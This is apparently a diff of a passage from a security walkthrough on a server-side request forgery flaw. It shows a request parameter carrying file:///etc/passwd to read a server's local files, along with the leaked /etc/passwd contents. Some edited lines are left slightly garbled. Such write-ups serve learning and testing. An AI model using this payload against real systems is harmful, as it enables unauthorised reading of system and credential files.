 As we saw earlier, we could not access the admin section of the server; this can be bypassed with this vulnerability:

-If the server had some local HTTP servers
+If the server had some local HTTP servers like a

-we could bypass the access controls with this vulnerability.
+could bypass the access controls with this vulnerability.

 We can use

-file:// to get internal files:
+file://to get internal files:

 product_id=&url=file%3a///etc/passwd&s=OK ... <div class="row d-flex justify-content-center"> root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync ...